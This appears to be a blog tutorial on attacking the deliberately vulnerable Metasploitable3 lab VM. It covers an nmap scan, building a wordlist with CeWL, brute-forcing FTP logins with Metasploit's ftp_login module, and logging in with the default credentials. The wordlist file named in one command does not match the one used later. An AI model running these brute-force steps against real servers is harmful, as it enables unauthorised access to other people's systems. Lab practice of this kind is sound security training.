Metasploitable3 is a VM that is built from the ground
up with a large amount of security vulnerabilities. It is intended to be used
as a target for testing exploits with Metasploit, hence to brush up our Metasploit skills.
We
already know that our target is metasploitable 3 so there is no point to
discover our target. So, let’s straight move upto nmap scan.
nmap -p- -sV 192.168.1.8
We
can see that FTP port is open so we can exploit it and to do so we need a
dictionary file through which we can successfully attack. To make a dictionary
file type the following command :
cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/dict.txt
CeWL
is a command used to make a customized wordlist using a given URL. Using the
above command will make a dictionary file from the Wikipedia of metasploitable3
and might help us to find our password.
After
generating the wordlist through CeWL, open Metasploit by typing msfconsole on
the terminal of your Kali.
And
then type:
use auxiliary/scanner/ftp/ftp_login
msf exploit (ftp_login)>set username
vagrant
msf exploit (ftp_login)>set rhosts
192.168.1.8
msf exploit (ftp_login)>set pass_file
/root/Desktop/pass.txt
msf exploit (ftp_login)>set stop_on_success
true
msf exploit (ftp_login)> exploit
Above
used exploit will give you a correct password to go with the username. Once you
have got it then open the WinScp software, give the target’s IP and the
port number along with the username: vagrant and password: vagrant
Then
click on Login button. After logging in you can find you the files on the FTP
server and you can use them to your advantage.
0 comments:
Post a Comment